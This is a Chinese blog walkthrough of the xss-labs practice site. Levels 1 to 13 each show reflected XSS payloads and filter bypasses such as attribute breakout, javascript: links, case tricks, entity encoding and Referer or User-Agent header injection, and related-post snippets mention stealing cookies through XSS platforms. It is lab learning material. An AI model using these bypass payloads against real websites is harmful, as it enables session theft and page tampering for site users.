web-xss

最新推荐文章于 2024-05-16 15:30:42 发布
最新推荐文章于 2024-05-16 15:30:42 发布
阅读量78 收藏
点赞数
文章标签: java 前端 javascript
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/h1825819493/article/details/131873928
版权

HTML的&lt; &gt;&amp;&quot;&copy;分别是<,>,&,",©;的转义字符

XML只有5个转义符: &lt; &gt;&amp; &quot; &apos;

HTTP请求中,Referer是header的一部分,当浏览器向web服务器发送请求的时候,一般会带上Referer,告诉服务器该网页是从哪个页面链接过来的,服务器因此可以获得一些信息用于处理。

referer

例如,在www.google.com 里有一个www.baidu.com 链接,那么点击这个www.baidu.com ,它的header 信息里就有: Referer=http://www.google.com.

如果服务器要求必须是某个地址或者某几个地址才能访问,而你发送的referer不符合他的要求,就会拦截或者跳转到他要求的地址,然后再通过这个地址进行访问。

第一关

payload:

xss-labs-master/level1.php?name=<script>alert(1)</script>

第二关

先用<script>alert(1)</script>进行尝试查看页面源码:可以看到script标签被包裹在input标签里面。script标签不能被嵌套在标签里面,否则触发不了。

<input name=keyword  value="<script>alert</script>">

payload:

xss-labs-master/level2.php?keyword="><script>alert(1)</script>

第三关

用"><script>alert(1)</script>尝试,查看源码:看到script标签直接被转译掉了

页面源码:
<input name=keyword  value='&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;'>

payload

<input name=keyword  value=''onclick='alert(1)''>
#这里的话onclick后面要用单引号,用双引号的话会被转译掉

第四关

用<script>alert(1)</script>进行尝试,查看页面源码:可以看到script的破折号被删除掉了

<input name=keyword  value="scriptalert/script">

payload:

<input name="keyword" value="" onclick="alert(1)">

第五关

用<script>alert(1)</script>进行尝试,查看页面源码:可以看到在script中间加了下横线

<input name=keyword  value="<scr_ipt>alert</script>">

用onclick尝试,发现也被过滤掉

<input name=keyword  value="" o_nclick="alert(1)"">

构造a标签,跳转超链接进行尝试

payload:

input name=keyword  value=""><a href="javascript:alert(1)">点我惊喜</a>">

第六关

用<script>alert(1)</script>进行尝试,查看页面源码:可以看到在script中间加了下横线

<input name=keyword  value="<scr_ipt>alert</script>">

用onclick尝试,发现也被过滤掉

<input name=keyword  value="" o_nclick="alert(1)"">

用大小写尝试的时候发现没有过滤

payload:

<input name=keyword  value=""><SCRIPT>alert(1)</script>">

第七关

用<script>alert(1)</script>进行尝试,查看页面源码:script直接被删除掉了

<input name=keyword  value="<>alert</>">

用onclick进行尝试,发现on被过滤掉,双写on进行绕过

payload

" oonnclick="alert(1)"

第八关

用<script>alert(1)</script>进行尝试,查看页面源码:可以看到script标签被转译掉了,还有<>也被过滤掉了

<input name=keyword  value="&lt;script&gt;alert&lt;/script&gt;">

用onclick进行尝试可以看到onclick也被转译掉了

<input name=keyword  value="&quot; οnclick=&quot;alert(1)&quot;">

但是此时也可以看到我们的代码时写在超链接里面的

 尝试直接在超链接构造js函数,但是可以看到js也直接被过滤掉了

</center><center><BR><a href="javascr_ipt:alert(1)">友情链接</a></center><center><img src=level8.jpg></center>

对javascript:alert(1)进行unicode编码

网址:http://www.jsons.cn/unicode/

payload:

&#x006a;&#x0061;&#x0076;&#x0061;&#x0073;&#x0063;&#x0072;&#x0069;&#x0070;&#x0074;&#x003a;&#x0061;&#x006c;&#x0065;&#x0072;&#x0074;&#x0028;&#x0031;&#x0029;

第九关

用<script>alert(1)</script>进行尝试,查看页面源码:可以看到script标签被转译掉了,还有<>也被过滤掉了,双引号也被过滤掉了,用onclick肯定是不行的

<input name=keyword  value="&lt;script&gt;alert&lt;/script&gt;">

 试了好几种注入姿势,都提示链接不合法,换一个百度合法地址试一试

换成合法链接进行尝试,发现超链接显示正常网址,尝试拼接js代码:javascript:alert(1);http://www.baidu.com

 在这里又发现js又被过滤掉,再次编码进行尝试

</center><center><BR><a href="javascr_ipt:alert(1)//http://www.baidu.com">友情链接</a>

payload 

&#x006a;&#x0061;&#x0076;&#x0061;&#x0073;&#x0063;&#x0072;&#x0069;&#x0070;&#x0074;&#x003a;&#x0061;&#x006c;&#x0065;&#x0072;&#x0074;&#x0028;&#x0031;&#x0029;//http://www.baidu.com
#加上//注释掉后面的正常网址,不然会报错

第十关

用<script>alert(1)</script>进行尝试:过滤掉<>

<h2 align=center>没有找到和&lt;script&gt;alert(1)&lt;/script&gt;相关的结果.</h2><center>

用οnclick="alert(1)"尝试:过滤掉""。单引号可以用

<h2 align=center>没有找到和οnclick=&quot;alert(1)&quot;相关的结果.</h2><center>

查看页面源代码的时候看见还有3个隐藏的标签,尝试将其改成文本框,只有t_sort可以成功

?keyword=&t_sort=" type='text'

 payload

?keyword=&t_sort=" type='text' onclick='alert(1)'

第十一关

跟第十关一样的判断,发现过滤掉:<> ""

 跟上一关一样有隐藏值,发现就只有t_sort可以更改成功,但是并没有和第十关一样有一个输入框

?keyword=t_link='' type='text'&t_sort='' type='text'&t_histoty='' type='text'&t_ref='' type='text'

 

 我们在判断的时候发现t_ref改变了,判断他是referer

 bp抓包增加一行referer

 payload

referer:" type='text' onclick='javascript:alert(1)'

第12关

查看源码:和上一关一样,这次的以看就是ua

 

 第13关

推测是cookie,带入之前的payload

 

第14关

偷吃"游"的阿彪
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
jQuery-with-XSS 检测jQuery版本是否存在XSS漏洞
09-29
动态站点会受到一种名为“跨站脚本攻击”(Cross Site Scripting, 安全专家们通常将其缩写成XSS,原本应当是css,但为了和层叠样式表(Cascading Style Sheet,CSS )有所区分,故称XSS)的威胁,而静态站点则完全不受...
lucy-xss-filter
04-30
Lucy-XSSXssFilter,XssPreventer Lucy-XSS是一个包含两个防御模块的开源库,用于保护Web应用程序免受XSS攻击。 它支持基于白名单规则的安全策略。 当前的默认规则是Naver的标准。 您可以根据需要更改默认规则。...
web-xss-dvwa
h1825819493的博客
08-09 1151
没有什么过滤,直接用最普通的标签就可以了。
Web 安全之 X-XSS-Protection 详解
路多辛的所思所想
11-27 1609
跨站脚本(XSS)是一种常见的网络攻击,攻击者通过在网站中插入恶意脚本,当用户访问被污染的页面时,恶意脚本会被执行,从而窃取用户的敏感信息、篡改页面内容或者执行其他恶意操作。XSS 攻击分为三种类型:持久型、DOM-based 型和反射型 XSS(非持久型)。持久型 XSS:攻击者在网页中插入恶意脚本,并将其保存到服务器或数据库中。当其他用户访问该页面时,恶意脚本会被执行,从而进行长期的网络攻击。这种类型的攻击比较危险,因为可以长期地影响用户。
CTFHUB-WEB-XSS-DOM反射
weixin_49539962的博客
08-08 287
但是在输入xss代码是要注意,我们可控的是“CTFHUB is very niubility”这句话,需要把这句话闭合后插入xss代码才能生效。和反射型是一样的,使用xss platform。
ctfshow-web-xss
qq_60905276的博客
01-22 499
1.web316 直接简单的测试一下 <script>alert("hack")</script> 发现并没有防护,直接开整。 (做xss-labs-master魔怔了,愣是不知道flag在哪,看别人才知道flag在cookie那里) 好,我们开个项目直接做。 轻松解决。 网站在下面XSS Platformhttp://xsscom.com/ 2.web317 又是一波测试,发现它把<script>标签过滤了。 那我们就用svg的,..
CTFHUB-WEB-XSS-存储型
weixin_49539962的博客
08-07 294
和反射型是一样的,使用xss platform。
CTFHub技能树 Web-XSS 详解
weixin_45808483的博客
11-15 3191
反射型 启动环境 我们在第一个框中输入 1 ,发现 hello后多了一个 1 ,这说明我们可以通过输入来更改页面内容 我们输入弹窗测试一下,发现成功弹窗 <script>alert(/xss/)</script> 我们将更改页面后的url输入第二个框,返回Successfully,猜测在后台进行访问。 这样的话我们就可以使用XSS platform平台。 下面这篇文章中向我们演示XSS platform的攻击测试。 Web安全之XSS...
CTFshow刷题日记-WEB-XSS(web316-333)
Love&Share
09-29 4153
web316-无过滤反射型XSS 大概就是要生成Xss代码链接,获取管理员cookie,后台bot每隔一段时间自动点击链接 方法一:xss平台 利用xss平台生成链接 xss平台 https://xsshs.cn/,https://xss.pt/,http://xsscom.com 在xss平台创建项目,选择默认模块即可,复制生成的xss代码,复制到题目留言框中 刷新下页面,然后在平台查看项目 方法二:自动接收脚本 在自己的服务器上放一个PHP代码 # a.php <?php $cookie
web漏洞-XSS
qq_21193587的博客
05-31 4819
XSS 漏洞介绍 XSS 攻击是指在网页中嵌入一段恶意的客户端 Js 脚本代码片段,JS 脚本恶意代码可以获取用户的 Cookie、URL 跳转、内容篡改、会话劫持……等。 漏洞危害 xss 攻击手段本身对服务端没有直接的危害,xss 主要是借助网站传播;一般通过留言板、邮件、等其他途径向受害者发送一段恶意的 URL,受害者通过访问该恶意 URL 可能会导致恶意的 xss 脚步会在受害者的客户端浏览器中执行,实现自己的目的 漏洞原理 XSS 的攻击类别分为:反射型、存储型、DOM 型等三大类攻击类别。 反射
CTFHUB-WEB-XSS-反射型
weixin_43486981的博客
08-13 3643
CTFHUB-WEB-XSS-反射型知识点:跨站脚本攻击XSS题目XSS platform平台 知识点:跨站脚本攻击XSS XSS允许恶意web用户将代码植入到提供给其它用户使用的页面中。 特点:能注入恶意的HTML/JavaScript代码到用户浏览器网址上,从而劫持会话 类型: DOM型。属于反射型的一种,利用非法输入来闭合对应的html标签。数据流向是URL→浏览器。 存储型。危害大。相关源代码存放于服务器,用户浏览该页面时触发代码执行。 反射型。需要攻击者提前构造一个恶意链接来诱使客户点击。 防
Web安全-XSS-基础05
qq_45927819的博客
02-16 1497
XSS Challenges靶场练习stage 1(无过滤)stage 2(属性中的XSS注入)stage 3(选择列表中的 XSS 注入)4.Stage #4 在隐藏域中注入 XSS5.Stage 5 (限制输入长度的解决方法)6.Stage 6 (限制输入 <> XSS的注入)7.Stage 7 (限制输入引号的 XSS 注入)8.Stage 8 (JavaScript伪协议)9.Stage 9 (UTF-7编码注入)10.Stage 10 (绕过关键字domain) 靶场:https://
anti-xss:AntiAntiXSS | 通过PHP防止跨站点脚本(XSS
05-02
:Japanese_secret_button: 反XSS “跨站点脚本(XSS)是一种通常在Web应用程序中发现的计算机安全漏洞。XSS使攻击者能够将客户端脚本注入到其他用户查看的网页中。跨站点脚本漏洞可能被攻击者用来绕过相同原产地策略...
常见WEB漏洞学习整理-XSS
06-11
常见WEB漏洞学习整理-XSS
WEB渗透学习-XSS-labs靶场
04-20
XSS-labs为WEB渗透中跨站脚本攻击专项练习靶场,内含多种攻击方式,采用关卡制,由易到难,适合刚接触该漏洞的新手巩固练习
jar包增量更新分析
junlaiyan的专栏
05-16 253
借助jdeps分析出jar包的增量文件
java实现拼图小游戏
monkey108的博客
05-16 617
本文主要提供用java实现的拼图小游戏源代码。
c【语言】了解指针,爱上指针(1)
最新发布
yzqy_的博客
05-16 901
在计算机中,数据是存储在内存中的,cpu从内存中读取数据,为了方便读取数据,内存又被划分为了一个个的内存单元,一个内存单元的大小就是一字节,一字节等于8bit位,我们给内存进行编号,这个编号就是地址,在c语言中给这个地址起了个名字。是的,亲爱的读者你肯定发现了,&a、p和pc输出的地址是一样的,但&a+1与p+1输出的地址是一样的00EFF940,一次都跳过了4字节,而pc+1输出的却是00EFF93D,一次只跳过一个字节。但是硬件与硬件之间是相互独立的,这该如何实现数据传输呢?”答案当然是否定的。
命令执行漏洞(二)
XLbb的博客
05-15 904
POST方法,S2-045-bypass-2漏洞存在!,程序更改为S2-045-bypass-2漏洞测试模式, 响应码: 200。POST方法,S2-046-bypass漏洞存在!POST方法,S2-045-bypass漏洞存在!POST方法,S2-046-1漏洞存在!POST方法,S2-046-2漏洞存在!POST方法,S2-046-3漏洞存在!POST方法,S2-045-1漏洞存在!POST方法,S2-045-3漏洞存在!POST方法,S2-045-2漏洞存在!POST方法,S2-045-4漏洞存在!
X-XSS-Protection缺失 修复
06-13
1. 在Web服务器上配置X-XSS-Protection头。例如,在Apache服务器中,您可以在配置文件中添加以下行: Header set X-XSS-Protection "1; mode=block" 2. 在应用程序中使用编程语言来添加X-XSS-Protection头。例如,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

偷吃"游"的阿彪

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值